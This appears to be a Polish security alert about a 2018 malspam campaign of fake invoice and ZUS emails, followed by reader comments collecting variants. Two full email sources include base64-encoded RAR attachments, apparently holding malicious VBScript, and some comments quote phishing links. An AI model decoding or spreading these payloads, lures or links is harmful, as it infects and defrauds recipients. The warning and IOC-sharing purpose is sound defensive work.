1/8/2018
TYP ATAKU
[M]alware
ZAWARTOŚĆ
Received: from wewesd (unknown [37.252.8.67])
by banolli.nazwa.pl (Postfix) with ESMTP id 7950E401B93
for ; Wed, 1 Aug 2018 02:11:34 +0200 (CEST)
From: "Kaczmarczyk Edyta" kaczmarczyk@basilico.pl
Subject: konta bankowego
Content-Type: multipart/mixed; boundary="fPlIo9CTBNQSXBuOAnHw=_Il0Q7W3hDk3N"
MIME-Version: 1.0
Reply-To: "Kaczmarczyk Edyta" kaczmarczyk1@basilico.pl
Organization: Kancelaria podatkowo Kaczmarczyk Edyta
Date: Wed, 1 Aug 2018 03:11:32 +0300
Message-Id: 20180801001134.7950E401B93@banolli.nazwa.pl
X-Antivirus: AVG (VPS 180801-0, 2018-08-01), Inbound message
X-Antivirus-Status: Clean
This is a multi-part message in MIME format
--fPlIo9CTBNQSXBuOAnHw=_Il0Q7W3hDk3N
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Dzie=C5=84 dobry, w za=C5=82=C4=85czniku przesy=C5=82am duplikat faktu=
ry. Informuj=C4=99 o zmianie numeru konta bankowego.=20
Kaczmarczyk Edyta
Kancelaria podatkowo
--fPlIo9CTBNQSXBuOAnHw=_Il0Q7W3hDk3N
Content-Type: application/octet-stream;
name="Fa_2018910.rar"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Fa_2018910.rar"
UmFyIRoHAQDz4YLrCwEFBwAGAQGAgIAA0qSqhSoCAwvZBATcCSCj7qCngAMADkZhXzIwMTg5MTAu
dmJzCgMC4ooC2Awp1AHNwFUCMGQzMzP2VvbT8Ug/HODQRyOWWa4DeEFkd2GssozYEwvm5EnY5XIn
m09Y5/71kHFt2ZOTCfkiw0miUSePEv9CjyPJE8iUe+HeHDvL78j8Y9BoH9poTmkQ+exYPDrNGmOQ
+SfDJI/PaNF6ajl0TSRS2jKnjlRpUoanHCUJYL031MxrnEGDBil/qTnnJ9CM1ONOovJ0zUqjvqQJ
PYcm2aFQp2GM9HENkO+kMbO4kob2bAXZQyxif0yG/KJZtaDeCNquAE7X4ojfiQS8A4IXkDSV/zQu
849gojjGq0ueQaS6U+vjocACNGejIZtMMQ4KkmRTLOcdlVbgd9Y+cRcHhV8TvwEeio/zP3iXfOjn
ZNS8ViCRQIs/Rpq7gbtt9V+3dv/Me9d9rcoumE7VzBgCnBcCNMG+X/Z8CtiljQeTVJmd0SQxqtug
bIjN2E9f4raxsVwKitZkbD8hSWK9ym3+wnvZ50LMFfnOlO5MYeYIKhB1CqysEECxBQQBmpAlTLGS
HRwkqYBQ36yd/2ee8WKpOu+7eWMCoVruxvMWje4JHw4KmlRz9TtFPDLpXJy7fuV2q+dwgqndm6Et
dn9Eg3ebo06r1WvUNrpKrwa1psKLlEDsAE8CCBr4BPJLmHafCzy5E0WRzZDrHus8dE4kbpb+BvO3
2uX2Vd97/YpVjJPqEtlhDXTf2O0B2Km4EEJ35S8afCgUCcC8FjTndixOu4rzbC9iK0hv33gMzXYK
AqmLA63cuWTPaSBJJT1cd8ZR1x+6ee0UzMM/GCz6Xthnrsl+LsVdRHfErrHkHXdWUQMFBAA=
--fPlIo9CTBNQSXBuOAnHw=_Il0Q7W3hDk3N--
Payload znajdziecie tutaj.
IOC:
http://172.245.158.165
https://www.faxpmessagesendpcsd.fidasasa
Inne warianty to:
From: “Skowron Agnieszka” drukarka@banolli.nazwa.pl
Dzień dobry
przesyłamy fakturę numer F/19108/135/03 wystawioną 24/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego podsumowanie.
Termin płatności 2018/08/03
Prosimy o wpłatę 205,5 złZ poważaniem,
Skowron Agnieszka
Z.H.U.P Qercus S.C.
oraz
> Dzień dobry,
W załączeniu zestawienie do rozliczenia kosztów.
Z poważaniem,Piwowarczyk Agnieszka
“Nasza-Ksiegowa.eu” Biuro Rachunkowe
co gorsza:
PS. Ponieważ, jak to często bywa, w tej kampanii mogą być wysyłane także inne wariacje powyższej wiadomości (inne linki, inne adresy nadawców, inne tytuły wiadomości), prosimy Czytelników o pozostawianie dalszych IOC w komentarzach pod tym tekstem. To ułatwi innym bezpiecznikom blokowanie niechcianych treści.
Jest jeszcze coś takiego:
“Witam,
W załączniku przesyłam Fakture VAT.
Dziękujemy za skorzystanie z naszych usług i zapraszamy ponownie.
Z poważaniem,
Rodak Lidia
“Ceteko” Sp. z o.o.
> Od: “Adam Chaniewski”
> Data: 1 sierpnia 2018 01:15:00 CEST
> Do: “biuro”
> Temat: deklaracja zus 07/18
> Odpowiedz-do: “Adam Chaniewski”
>
> Dzień dobry,
>
> W załączniku przesyłam deklaracje ZUS za 07/18.
>
>
> Pozdrawiam,
>
>
> Adam Chaniewski
>
> “Chaniewski”
Ja dostałem coś takiego:
“Witam
przesyłamy fakturę numer F/121008/136/02 wystawioną 25/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego
podsumowanie.
Termin płatności 2018/08/03
Prosimy o wpłatę 495 zł
Z poważaniem,
Skowron Agnieszka
Z.H.U.P Qercus S.C.”
witam,
potwierdzam słowa
damian 2018.08.01 12:27
otrzymałem takiego maila
Dzień dobry
przesyłamy fakturę numer F/121008/137/04 wystawioną 26/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego podsumowanie.
Termin płatności 2018/08/03
Prosimy o wpłatę 370 zł
Z poważaniem,
Skowron Agnieszka
Z.H.U.P Qercus S.C.
W dniu 2018-08-01 04:09:54 użytkownik Rodak Lidia napisał:
> Witam,
>
>
> W załączniku przesyłam Fakture VAT.
> Dziękujemy za skorzystanie z naszych usług i zapraszamy ponownie.
>
>
> Z poważaniem,
>
>
> Rodak Lidia
>
> “Ceteko” Sp. z o.o.
U mnie takie coś:
Witam,
W załączniku przesyłam deklaracje ZUS za 07/18.
Z poważaniem,
Adam Chaniewski
“Chaniewski”
Rodak Lidia
Zestawienie VAT – sprzedaży nr. 1931/07/2018
———————————–
treść maila:
Witam,
W załączniku przesyłam Fakture VAT.
Dziękujemy za skorzystanie z naszych usług i zapraszamy ponownie.
Z poważaniem,
Rodak Lidia
“Ceteko” Sp. z o.o.
————————————————
wewnątrz plik VBScript spakowany RARem
————————————————
Generalnie jestem wyczulony na takie dziadostwa, jeśli jest archiwum to na 100% coś nie tak, jak mam czas to otwieram notatnikiem, dla sprawdzenia skryptu.
Pozdrawiam
Nadawca: Andrzej Zieliński
——–
Witam,
Dziękuję za zamówienie. W załączniku znajduje Pan(i) skan faktury.
Możemy zaproponować wysyłkę naszą spedycją za 30PLN doliczone do faktury i
płatność przelewem – 7 dni.
Z poważaniem,
Andrzej Zieliński
ul. Armii Poznań 49
62-032, Luboń
tel. (061) 813 10 02
fax. (061) 813 47 07
email : biuro24@grupa-river.pl
——-
w załączniku:
skan_faktury.rar
a w nim:
skan_faktury.jse
Co ciekawe poczta również na nazwa.pl (grupa-river.nazwa.pl/)
Received-SPF: none (silesiamanagement.pl: No applicable sender policy available) receiver=s36-mx.ogicom.net; identity=mailfrom; envelope-from=”lukasz.dobek@silesiamanagement.pl”; helo=aln113.rev.netart.pl; client-ip=85.128.170.113
X-Greylist: delayed 327 seconds by postgrey-1.34 at s36-mx; Thu, 02 Aug 2018 06:26:50 CEST
Received: from aln113.rev.netart.pl (aln113.rev.netart.pl [85.128.170.113])
W załączniku przesyłam fakturę do złożonego zamówienia.
Informujemy, ze zalaczony dokument jest faktura w rozumieniu Ustawy z dnia 30.05.2018 r. o podatku od towarów i uslug. Mozna ja
przechowywac w formie elektronicznej lub papierowej po wydrukowaniu.
Pozdrawiam,
Lukasz Dobek
“Elektros” Sp. z o.o.
Ta sama kampania u mnie, z tym że:
– Received: from rfrrrff (unknown [37.252.8.76])
– rar uszkodzony (:D)
– “od -bc Fa_0720187.rar” wykazało, że w środku siedzi 0720187.vbs
– podpis Krzysztof Jarmołowski “Xero-Serwis”
– nadawca monika@alfa-serwis.com.pl
Ja dostałem jeszcze coś takiego:
Robert Nosek
Reply-To:
Robert Nosek
To:
maciek@m8studio.pl
Folder:
Inbox
message-disclosure-triangle-active.png
file-rar.png
Fa_2018338.rar
(680 B)
icon-attachment-download.png
sending-spinner.gif
8:27 am
ic-dropdown-reply.pngicon-thread-disclosure.pngmessage-actions-ellipsis.png
You
To:
Robert
•••
reply-footer.pngWrite a reply…
RN
Dzień dobry
w załączeniu przesyłamy fakturę. W tytule przelewu prosimy o podanie
tylko numeru faktury.
Pozdrawiam,
Sylwia Snopek
“Finans” Biuro Rachunkowe
Ten atak prowadzony jest najmniej od kilku dni i polega na włamaniach na systemy hostowane w nazwa.pl, rozsyłanie wiadomości w ilości odpowiednio małej i zróżnicowanej co do zawartości. Akcja wyjątkowo dobrze przygotowana, chociaż nie pozbawiona błędów. Moim zdaniem administratorzy Nazwa.pl powinni mocno popracować nad bezpieczeństwem.
Temat: deklaracja zus 07/18
Data: Thu, 2 Aug 2018 03:53:01 +0300
Nadawca: Mirosława Pieprzycka
Odpowiedź-Do: Mirosława Pieprzycka
Firma/Organizacja: “Kina” P.H.U.
Witam
przesyłamy fakturę numer F/10708/134/25 wystawioną 27/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego podsumowanie.
Termin płatności 2018/08/02
Prosimy o wpłatę 370 zł
Z poważaniem,
Mirosława Pieprzycka
“Kina” P.H.U.
Załącznik: Fa_0720185.rar, w środku vbs o tej samej nazwie.
temat maila: faktura 07/18
treść:
Witam
przesyłamy fakturę numer F/19108/134/01 wystawioną 27/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego podsumowanie.
Termin płatności 03/08/2018
Prosimy o wpłatę 205,5 zł
Z poważaniem,
Skowron Agnieszka
Z.H.U.P Qercus S.C.
—————-
załącznik:
list od Skowron Agnieszka do Ciebie
list.txt(0,32 kB)
zapisz|pokaż
załączniki :
Fa_2018335.rar(0,66 kB)
zapisz
info(at)silesiamanagement.pl
—–
Zestawienie VAT/ZUS
—–
oraz
powyższe
biuro24@grupa-river.pl
Witam
przesyłamy fakturę numer F/19171/136/02 wystawioną 24/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego
podsumowanie.
Termin płatności 2018/08/03
Prosimy o wpłatę 370 zł
Z poważaniem,
Skowron Agnieszka
Z.H.U.P Qercus S.C.
Witam.
dziś dostałem.
nadawca : Piotr Konieczny… “Piotr Konieczny”
treść
Dzień dobry,
W załączeniu zestawienie do rozliczenia kosztów.
Z poważaniem,
Piotr Konieczny
“Biu-Max” Firma Handlowa
załącznik.
https://www.virustotal.com/#/file/f3411f6ef5ff5b1b43c5b1642ad5b6c5430a23eb4937863cc6679de04f281e57/detection
nagłówek:
Return-Path:
Received: from amt252.rev.netart.pl (85.128.202.252) (HELO amt252.rev.netart.pl)
by xxxx.home.pl (xx.161.169.207) with SMTP (IdeaSmtpServer 0.83)
id 9dcb8cf4f1677f7e; Fri, 3 Aug 2018 02:38:42 +0200
X-Virus-Scanned: by amavisd-new using ClamAV (16)
X-Spam-Flag: NO
X-Spam-Score: 0.001
X-Spam-Level:
X-Spam-Status: No, score=0.001 tagged_above=-10
tests=[FSL_HELO_NON_FQDN_1=0.001] autolearn=disabled
Received: from mmmvvdd (unknown [37.252.8.70])
by cdocb.nazwa.pl (Postfix) with ESMTP id 2EAF02345CF
for ; Fri, 3 Aug 2018 02:38:42 +0200 (CEST)
From: “Piotr Konieczny”
Subject: Zestawienie08
To: informatyczny@xxxxxxx.pl
Content-Type: multipart/mixed; boundary=”S22DZcZfANwrRuBYE=_wNzasEAuRFA9vw8″
MIME-Version: 1.0
Reply-To: “Piotr Konieczny”
Organization: “Biu-Max” Firma Handlowa
Date: Fri, 3 Aug 2018 03:38:38 +0300
Message-Id:
Dzień dobry.
Wczoraj (02.08.2018) dostaliśmy to:
Dzień dobry
przesyłamy fakturę numer F/19108/134/03 wystawioną 24/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego podsumowanie.
Termin płatności 2018/08/03
Prosimy o wpłatę 370 zł
Z poważaniem,
Skowron Agnieszka
Z.H.U.P Qercus S.C.
a dzisaj następny:
Dzień dobry,
dziękujemy za skorzystanie z naszych usług.
W załączniku przesyłam fakturę do złożonego zamówienia.
Pozdrawiam,
Janusz Uściński
“Copysystem” Przedsiębiorstwo Handlowo-Usługowe
Poniżej zebrałem to co spłynęło do mnie od ludzi w firmie od wczoraj:
From: Joanna Beśka [mailto:m.szylejko@cbgrupa.pl]
Witam,
W załączniku przesyłam deklaracje ZUS za 07/18.
Z poważaniem,
Joanna Beśka
Technika Biurowa Sp. z o.o.
================================
From: Bartosz Krysmann [mailto:p.krakowiak@cbgrupa.pl]
Dzień dobry
przesyłamy fakturę numer FV/12138108/24/25 wystawioną 27/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego podsumowanie.
Termin płatności 2018/08/03
Prosimy o wpłatę 490 zł
Z poważaniem,
Bartosz Krysmann
“Bartserwis”
================================
From: Piotr Konieczny
Dzień dobry,
W załączeniu zestawienie do rozliczenia kosztów.
Pozdrawiam,
Piotr Konieczny
“Biu-Max” Firma Handlowa
=================================
From: Urszula Łukasik
Witaj
w załączeniu przesyłamy fakturę. W tytule przelewu prosimy o podanie tylko numeru faktury.
Pozdrawiam,
Urszula Łukasik
“Lux Copy”
=====================================
From: Szaniewska Małgorzata
Dzień dobry,
przesyłam dokument Faktura 25/07/2018 na kwotę 459,00 zł .
Z poważaniem,
Szaniewska Małgorzata
ANDRA Sp. z o.o.
=================================
From: Krzysztof Jarmołowski [mailto:monika@alfa-serwis.com.pl]
Dzień dobry,
W załączniku przesyłam Fakture VAT.
Dziękujemy za skorzystanie z naszych usług i zapraszamy ponownie.
Z poważaniem,
Krzysztof Jarmołowski
“Xero-Serwis”
=====================================
Wszystkie wiadomości zawierają załączniki w formacie .rar o bardzo zbliżonych nazwach (Fa-2018084.rar, Fa-2018081.rar itp).
Dzień dobry
przesyłamy fakturę numer F/121008/134/04 wystawioną 25/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego podsumowanie.
Termin płatności 2018/08/03
Prosimy o wpłatę 4350 zł
Z poważaniem,
Skowron Agnieszka
Z.H.U.P Qercus S.C.
Return-Path:
Delivered-To: @tlen.pl
Received: (wp-smtpd mx.tlen.pl 22195 invoked from network); 1 Aug 2018 01:23:29 +0200
Received: from ady48.rev.netart.pl ([77.55.102.48])
(envelope-sender )
by mx.tlen.pl (WP-SMTPD) with SMTP
for ; 1 Aug 2018 01:23:29 +0200
X-Virus-Scanned: by amavisd-new using ClamAV (6)
X-Spam-Flag: NO
X-Spam-Score: 0.101
X-Spam-Level:
X-Spam-Status: No, score=0.101 tagged_above=-10
tests=[FSL_HELO_NON_FQDN_1=0.001, _NA_NETIA_SUBJECT=0.1]
autolearn=disabled
Received: from vvvcccxxf (unknown [37.252.8.67])
by banolli.nazwa.pl (Postfix) with ESMTP id 093D843F987
for ; Wed, 1 Aug 2018 01:23:28 +0200 (CEST)
From: “Tomasz Murach”
Subject: Faktura
To: @tlen.pl
Content-Type: multipart/mixed; boundary=”=_LRkdojbrGLHs9No9Kwg7K0Sw6ErkR9Ll”
MIME-Version: 1.0
Reply-To: “Tomasz Murach”
Organization: Tony Transport
Date: Wed, 1 Aug 2018 02:23:27 +0300
Message-Id:
X-WP-DKIM-Status: no signature (id: n/a)
X-WP-MailID: 97011a8cbbf38c17397d7a5c296dbeda
X-WP-AV: skaner antywirusowy Poczty o2
X-WP-SPAM: YES (U9) 0100019 [0EaU]
This is a multi-part message in MIME format
–=_LRkdojbrGLHs9No9Kwg7K0Sw6ErkR9Ll
Content-Type: text/plain; charset=”utf-8″
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Witam,
w za=C5=82=C4=85czeniu przesy=C5=82am faktur=C4=99 VAT.
Pozdrawiam,
Tomasz Murach
Tony Transport
–=_LRkdojbrGLHs9No9Kwg7K0Sw6ErkR9Ll
Content-Type: application/octet-stream;
name=”Fa_2018339.rar”
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=”Fa_2018339.rar”
UmFyIRoHAQDz4YLrCwEFBwAGAQGAgIAA6neCsSoCAwvaBATZCSBEOy6BgAMADkZhXzIwMTgzMzku
dmJzCgMCJ7KC1wwp1AHJx1YCMGREMjT0YEXtp4VifHWLRDBgQk1LeAoDm6thCLW0jVObB44MjHj1
vHsGe97AVW24bjCI8Stp5jy7y7urq7fkOXV5WX+Mv8ffKuFKuVeI/OPSZ93aaB40h3XrFh6DYaNE
cj2WfFJI7PaND6a3i6JpIZbRkzxyn1JSNXhwlCWC9N9jLbJxBAwWpfEo0Tk/BGKnGrWXk6JqVTzq
TiXbDU0WlMCIjGcjhGx2/SCNfcSUN7NgLswZZBPESG/R5ZthzeB9qeCE7XYYTfmQS+A6IXlDSV3z
Oq8ZIhQ/GNVpe8g0l1I9fHS0AEaL9GQz6oIRwTJMemW847Kq2g/dg+cZcHBVgnfgIsKj/dHeJN50
c7JqXesQSKBFn6sMXcLNtm/gt3cHWPerAxuSXTA8F97Bhw9bCxvp8M1CtaljQeDVJnb0yQRpttgW
HjN2XN5/yuKGmuBqK2znie5CmUKflNn+BPeyvQskr/tCEbkRh4ffqEGzprKwQALTlCQDdZxKl1ss
GngSofFCfvL3/dxzxWql1V1t5owKhXPdkcWtG9wQPhoVJKfn7LdFPjKpXJ27guV2qucpBmnde6Et
dn+EgzeZo0v3qtb42ukqvBrWmgouUQMQBLgIIHPyCeSGsW17Evy5HqLI5shFD+qO/ROJG8U/fd72
+0ze3VXXfq1KsZI9QlssIbKb6jtAdipOC/A87KXjDoUCgTgXwsYa7seNtvHeZWVsPWkN9/D5l67B
IFUxYDM3LlkzmogQSU9njvkKPOP3Tz2imJhn6sWfStsL9Vkvx6tV2SOwSuseQB13VlEDBQQA
–=_LRkdojbrGLHs9No9Kwg7K0Sw6ErkR9Ll–
Witam
przesyłamy fakturę numer F/121008/135/02 wystawioną 24/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego podsumowanie.
Termin płatności 2018/08/03
Prosimy o wpłatę 205,5 zł
Z poważaniem,
Skowron Agnieszka
Z.H.U.P Qercus S.C.
oraz
Witaj,
przesyłam dokument Faktura 11/07/2018 na kwotę 399,00 zł .
Z poważaniem,
Szafrańska Weronika
Glob-Trans Sp. z o.o.
Zgłaszam dość regularnie spam do home.pl i nazwa.pl, bo to u nich w 99% zarejestrowane są domeny spamerów, co prawda nie zawsze hosting ich. Mają w czterech literach te zgłoszenia. Zawsze dostaję info, że to nie jest ich sprawa, albo pomimo wpisów w whois, że nie ich domena/serwer/IP. Podsyłam raporty z virustotal, etc. NIC, ZERO REAKCJI. To teraz mają za swoje.
Otrzymałem coś takiego
W załączniku przesyłam fakturę do złożonego zamówienia.
Informujemy, ze zalaczony dokument jest faktura w rozumieniu Ustawy z dnia
30.05.2018 r. o podatku od towarów i uslug. Mozna ja
przechowywac w formie elektronicznej lub papierowej po wydrukowaniu.
Pozdrawiam,
Lukasz Dobek
“Elektros” Sp. z o.o.
Faktura z 13 lipca
From: Katarzyna Dylewska [mailto:biuro@gumbi.nazwa.pl]
Sent: Friday, July 13, 2018 3:59 AM
To:
Subject: fakturę nr 13414 FS 7637/MAG/07/2018
—
Dzień dobry,
dziękujemy za skorzystanie z naszych usług.
W załączniku przesyłam fakturę do złożonego zamówienia.
Pozdrawiam,
Katarzyna Dylewska
Biuro Rachunkowe FINANSUS
Dzień dobry
przesyłamy fakturę numer FV/10244808/25/25 wystawioną 26/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego podsumowanie.
Termin płatności 03/08/2018
Prosimy o wpłatę 385 zł
Z poważaniem,
Bartosz Krysmann
“Bartserwis”
Dzień dobry,
W załączeniu zestawienie do rozliczenia kosztów.
Z poważaniem,
Peas Anna
“Zbiersk” Sp. z o.o.
Witam, w załączniku przesyłam duplikat faktury. Informuję o zmianie
numeru konta bankowego.
Kaczmarczyk Edyta
Kancelaria podatkowo
Witam,
W załączniku przesyłam deklaracje ZUS za 08/18.
Z poważaniem,
Izabela Zakrzewska
“Emi” Sp. z o.o.
Witaj,
przesyłam dokument Faktura 26/07/2018 na kwotę 533,00 PLN brutto .
Z poważaniem,
Szaniewska Małgorzata
ANDRA Sp. z o.o.
z adresu:
szaniewsk.m@app.banolli.pl
Dzień dobry,
dziękujemy za skorzystanie z naszych usług.
W załączniku przesyłam fakturę do złożonego zamówienia.
Pozdrawiam,
Grzegorz Gajda
“DC System” Sp. z o.o.
z adresu:
d.c.system@fundacjaeuro.nazwa.pl
Witam
Czy wiadomo na obecną chwilę jaki jest efekt otwarcia tego .rar z fakturą. Wiadomo iż jest tam skrypt ale co on wywołuje ?
Pozdrawiam
Uwaga, dostalam załącznik z maila :babik.c@fundacjaeuro.nazwa.pl
treść:
Dzień dobry,
przesyłam dokument Faktura 07/08/2018 na kwotę 293,00 zł .
Z poważaniem,
Czesław Babik
“Poleski” Sp. z o.o.
Dzień Dobry.
Przesyłam potwierdzenie przelewu za zaległą fakturę z maja, na kwotę: 2699,90zł.
Przepraszam za zwłokę.
Pozdrawiam
Klaudiusz Graczyk
biuro_graczyk@zoho.eu
W załączniku PDF z linkiem do wrzucacza
Temat: fakturę 07/18 [z błędem]
Dnia 3 sierpnia 2018 03:59 Bartosz Krysmann napisał(a):
Dzień dobry
przesyłamy fakturę numer FV/1277821/25/29 wystawioną 25/07/2018.
Dokument znajduje się w załączniku, a poniżej prezentujemy jego podsumowanie.
Termin płatności 03/08/2018
Prosimy o wpłatę 682,5 zł
Z poważaniem,
Bartosz Krysmann
“Bartserwis”
W załączniku
Fa-2018085.rar
740.0 B
[oczywiście nie otwierałem]
Na maila odpowiedziałem, cyt: “Spierdalaj oszuście”
użyta w adresie mailowym nadawcy p.krakowiak@cbgrupa.pl domena cbgrupa.pl przekierowywana jest automatycznie na adres internetowy firmy COMMON BUSINESS – http://cdocb.pl/index.html
Do nich maila też wysłałem, że się ktoś pod nich podszywa.
Mam nadzieję, że użyte przeze mnie sformułowania są czytelne, nie jestem informatykiem ani programistą.
Pozdrawiam
Received: from ddooddssw (unknown [37.252.9.110])
by fundacjaeuro.nazwa.pl (Postfix) with ESMTP id 0FF991A6288
for biuro@kowalstwo.com.pl>; Fri, 10 Aug 2018 07:27:25 +0200 (CEST)
From: “Grzegorz Obuchowicz” grzegorz.o@fundacjaeuro.nazwa.pl>
Subject: zmianie konta
Content-Type: multipart/mixed; boundary=”G6CWfdcwB=_AS7O6E8TbAeTCuyo8j0p1Ym”
MIME-Version: 1.0
Reply-To: “Grzegorz Obuchowicz” grzegorz.o1@fundacjaeuro.nazwa.pl>
Organization: Clean Service Sp. z o.o.
Received: for biuro@kowalstwo.com.pl>
Date: Fri, 10 Aug 2018 08:27:22 +0300
Message-Id: 20180810052726.0FF991A6288@fundacjaeuro.nazwa.pl>
X-EsetId: 37303A29030F9162667660
Witam,
w załączniku przesyłam duplikat faktury. Informuję o zmianie numeru konta bankowego.
Grzegorz Obuchowicz
Clean Service Sp. z o.o.
Dzisiaj dostałem takiego maila:
Dzień dobry,
W załączniku przesyłam deklaracje ZUS za 08/18.
Pozdrawiam,
Marta Kotalewicz
Multi-Office
Witam,
W zalaczeniu zestawienie do rozliczenia kosztow.
Pozdrawiam,
Agnieszka Szymanska
Partners In-Plus Sp. z o.o.
-dziś dostałam takiego maila z: zamawiam@e-mod.com.pl
Witaj,
W załączeniu zestawienie do rozliczenia kosztów.
Pozdrawiam,
Agnieszka Szymańska
Partners In-Plus Sp. z o.o.
dzisiaj od m.wos@mkmconsulting.pl
Dzień dobry,
W załączeniu zestawienie do rozliczenia kosztów.
Z poważaniem,
Agnieszka Szymańska
Partners In-Plus Sp. z o.o.
Wiadomość otrzymana 17.08.2018 r. od m.wos@mkmconsulting.pl
Received: from [127.0.0.1] (port=40368 helo=3aw.news)
(envelope-from )
id 1fuRWQ-000442-6c
for ; Tue, 28 Aug 2018 02:06:25 +0200
Received: from 3aw.news ([185.17.122.57] helo=3aw.news) by
with SMTP (2.5.6); 28 Aug 2018 02:06:13 +0200
Return-Path:
Reply-To: “Surowiec Dominika”
From: “Surowiec Dominika”
To:
Subject: =?UTF-8?Q?w_za=C5=82=C4=85czeniu_Faktura_nr_FS_15654?=
=?UTF-8?Q?/08/2018?=
Date: Tue, 28 Aug 2018 02:06:13 +0200
Organization: =?UTF-8?Q?Us=C5=82ugi_Biurowo-Administracyjne?=
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”—-=_NextPart_000_009C_01D43EB0.66B74500″
X-Mailer: Microsoft Outlook 14.0
Thread-Index: AdQ+YvZEKF4J7FDcRQOUdFNrDBK/7g==
Z adresu: billing@361tui.com
Dzień dobry,
W załączeniu zestawienie do rozliczenia kosztów.
Z poważaniem,
Stanisław Beskow
Usługi Biurowo-Księgowe
Ja dziś dostałem takiego maila:
Od: Jabłońska Ewa
Odpowiedź do: Jabłońska Ewa
– – –
Dzień dobry,
W załączeniu zestawienie do rozliczenia kosztów.
Pozdrawiam,
Jabłońska Ewa
Biurowe Usługi Księgowe
____________________________
W załączniku plik rar: faktura18904051.rar (871 B)
Ja dostałem taki email:
faktura_14458/12/21
21 grudnia 06:46
Od:
Weronika Szafrańska
Pokaż historię Wyświetl nagłówki wiadomości
Do:
mnie
Wysłano:
21 grudnia 06:46 (Piątek)
Temat:
faktura_14458/12/21
Folder:
SPAM
Skrzynka:
Podpisana:
botarmada.com
Dzień dobry,
Prosimy o jej uregulowanie. Przesyłam wykaz faktur, w tym faktura po terminie.
Dane do faktury: http://half.707golf.com/smtp02/luxembourg.html?email=e7a04@e721b
Weronika Szafrańska
Baumer Sp. z o.o.
Witam,
Prosimy o jej uregulowanie. Przesyłam wykaz faktur, w tym faktura po terminie.
Dane do faktury: http://appengine.used-auto.org/vm02/pr2.html?email=316bb@b66b6
Weronika Szafrańska
info@botarmada.com
Baumer Sp. z o.o.
Co ciekawe podszywają się pod istniejącą firmę
Dzien dobry
Wysyłam opisane potwierdzenie salda w linku http://groups.sareahwalter.com/pk/dac.php?email=ea738@1a3f7
Kowalski Wojciech
FRESH LOGISTICS POLSK
Kowalski Wojciech
zamowienia@alfa.org.pl
Dzień dobry,
Prosimy o jej uregulowanie. Przesyłam wykaz faktur, w tym faktura po terminie.
Dane do faktury: http://map.pays2shopweb.com/bruce/imgup-lb.html?email=14c2a@5602d
Weronika Szafrańska
Baumer Sp. z o.o.
co chwilkę na maila dostaję przeróżne takie cuda :/
z Baumera – to co powyżej, też dostałam
Dzień dobry,
Prosimy o jej uregulowanie. Przesyłam wykaz faktur, w tym faktura po terminie.
Dane do faktury: http://parts.nanot5reflector.com/seoul/rw.html?email=45b39@178ca
Magdalena Brzeźnicka
PHU “Poligress”
Dzień dobry,
Prosimy o jej uregulowanie. Przesyłam wykaz faktur, w tym faktura po terminie.
Dane do faktury: http://globalshippingtracking.randombrownguy.net/sarah/utility.php?email=e8bc8@4a0f2
Weronika Szafrańska
Baumer Sp. z o.o.
Witam,
Prosimy o jej uregulowanie. Przesyłam wykaz faktur, w tym faktura po terminie.
Dane do faktury: http://geb.digitalmarketingla.com/dangan/guardian.php?email=54aff@75b0c
Weronika Szafrańska
Baumer Sp. z o.o.
Witam.
Dostałem takiego maila nadawca salikhzan9sxs@o2.pl z załącznikiem nie otwierałem oto jego treść :
faktura 2802
Dzień dobry, W załączeniu zestawienie do rozliczenia kosztów. Z poważaniem, Piwowarczyk Agnieszka “ Nasza-Ksiegowa.eu” Biuro Rachunkowe
Pozdrawiam,
Piotr
Dostałem coś takiego:
Witam,
W załączniku faktury do rozliczenia. Ale to będziemy się liczyć na koniec lutego bo będę miał do wystawienia dużą fakturę.
Pozdrawiam,
Edward Domagała
“Draco” Sp. z o.o.
@grzegorz: teraz przyszło?